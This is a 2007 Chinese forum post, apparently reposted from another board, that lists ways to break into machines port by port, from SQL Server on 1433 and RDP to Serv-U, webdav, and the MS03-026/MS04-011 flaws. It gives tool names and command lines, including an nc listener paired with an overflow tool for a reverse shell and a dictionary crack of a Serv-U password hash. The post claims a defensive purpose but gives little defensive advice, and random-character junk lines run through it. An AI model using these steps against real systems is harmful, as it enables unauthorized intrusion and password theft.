下沙论坛

 找回密码
 注册论坛(EC通行证)

QQ登录

QQ登录

下沙大学生网QQ群8(千人群)
群号:6490324 ,验证:下沙大学生网。
用手机发布本地信息严禁群发,各种宣传贴请发表在下沙信息版块有问必答,欢迎提问 提升会员等级,助你宣传
新会员必读 大学生的论坛下沙新生必读下沙币获得方法及使用
查看: 1852|回复: 1
打印 上一主题 下一主题

入侵方法以及工具防范

[复制链接]
头像被屏蔽

该用户从未签到

跳转到指定楼层
1
发表于 2007-12-17 01:04:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。
7 t9 ~" k5 N. v% Z& b   % V  f  h( i3 r4 X0 L6 E

1 c0 u" N5 x2 M4 M' {- l: U  `$ S. [  1. 1433端口入侵
- |4 w  [5 l2 p9 F2 |! ^
- a" d0 m, B& Y# l3 J  scanport.exe 查有1433的机器
1 D- T+ O; u' Y  H# |0 P4 M
2 f' W8 Y6 k; W  SQLScanPass.exe 进行字典暴破(字典是关键) # H. S; q% s/ g+ n0 B2 T* b6 D* X

) C; p1 s) u$ N; C7 M  最后 SQLTools.exe入侵
0 K4 u$ A5 K" `# B; j  Z4 @3 K- c- O! b7 l- p: J6 t
  =============================
' f6 D1 d/ t0 X0 E* T
  C. b+ A% S: [( G  对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
" [" H$ V' @7 n( N3 A. v1 H' _5 s8 A; T- L8 T
  nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 ; L" r; N7 {! ^! X# H) p
1 S+ T6 }5 `( C# D
  (以上反向的,测试成功)
5 R1 v7 m9 @1 ^% r1 F% F' t0 b$ a
  sqlhelloz.exe 入侵ip 1433 (这个是正向连接) * o1 N9 C( `  T
   " _; L. M- M, R( y% `
  2. 4899端口入侵 1 X% L8 C, M3 d" {- J

7 _0 h* ~0 q. ?" x3 W5 b  用4899过滤器.exe,扫描空口令的机器   
1 d) j+ ]8 O+ ~5 W6 K5 b5 E7 _. v! }! ?5 c8 A
  3. 3899的入侵 : G1 o5 c' S9 O( [2 J/ V, u
( ?5 e- ?, e7 C+ D( u
  对很早的机器,可以试试3389的溢出(win3389ex.exe) - h2 @  N2 a0 Q3 C! W& O& V  |

' m& z; [& h9 X. b4 a5 b, s  y  对2000的机器,可以试试字典暴破。(tscrack.exe)
. h6 e' R. d( Q/ ^' T   + q$ p4 B* N5 Y  i, E) K" |
  4. 80入侵
! U& q( f1 z, G# p$ S* q  q. X6 U  S& O
  对sp3以前的机器,可以用webdav入侵;
: b6 P5 I! O% b6 Q# H( D" j, m& t; ]
) P* ]  e" P3 E5 I3 g! r, x# m4 K  对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) 1 Q$ \" l% d4 m8 x" I3 v6 \
$ M5 s% j" K2 d4 f" F
  可以利用SQL进行注入。(小榕的注入软件)。 ; J6 Y$ i4 |3 V0 T  W: C

+ @0 t: x: j8 l6 b9 \1 B8 B  5. serv-u入侵(21端口)
1 E$ q/ Y; V% r1 a) ?' [% Q
/ _0 W8 F" z  C7 \  m2 K- C- z  对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
9 l. R" M, p2 h1 Z0 j1 x) I8 ^; j+ g. V: L; B) K( A
  对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe) 4 @  O! R4 r* c$ `! U$ d0 [

: R) L. i4 _. n, k2 @  ====================================== % K, q2 A2 l6 {1 j& O

5 s' X0 P& P* g" j( q& `& |. V  对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) ' x. _* w) c, e+ a/ R* i
& h  t7 f! w7 T' J% G/ U
  输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A - l3 o  x' M/ D. E' @7 `* E' h
   4 ]2 e) m4 P' ]/ I6 p+ ^. x2 `
  6. 554端口 1 g7 n+ i" j0 C' T: E: R' W" Q
) h' @1 q' G" ]( Z) V/ L# d  ]$ p
  用real554.exe入侵。
/ K: T5 z; C* a( j7 E  
" ?7 Z  o+ C# v1 A/ A  7. 6129端口
9 z# ~/ w. U9 K# D. ]  p9 o& A5 _5 p( B0 K; Y+ m2 E
  用DameWare6129.exe入侵。
5 @& V+ e9 Z8 f
+ p+ @4 B3 B' E. V: s6 }  8. 系统漏洞 & l/ L0 O( V* [
6 w9 H6 S  M7 u( A# P
  利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
( z4 ?: X9 u) d) B9 a: M# V* |  x7 s8 L5 p" m/ {( k
  进行溢出入侵。
* o9 h3 Y* C- g* P. }0 s" ~
0 a+ l9 @: J. j' H0 `  9. 3127等端口
+ J6 J7 X) b( Z) Q0 @3 H1 H0 _
5 X* b2 ?5 T) p. Z  可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。 $ T, r: P" L! i/ @2 N
5 z0 Z4 B% g) ?& G. @2 J
  10. 其他入侵 1 Z$ `9 [) s* p7 J9 w
  u9 M! ~( m' M
  利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。% l  Y7 \; E: L& U5 o: d

3 S0 }; M3 e  q" K1 f
转自杜松论坛:http://www.juniperbbs.net/index.php
分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏 分享分享 顶 踩

该用户从未签到

2
发表于 2007-12-17 22:31:45 | 只看该作者
回复 支持 反对

使用道具 举报

本版积分规则

关闭

下沙大学生网推荐上一条 /1 下一条

快速回复 返回顶部 返回列表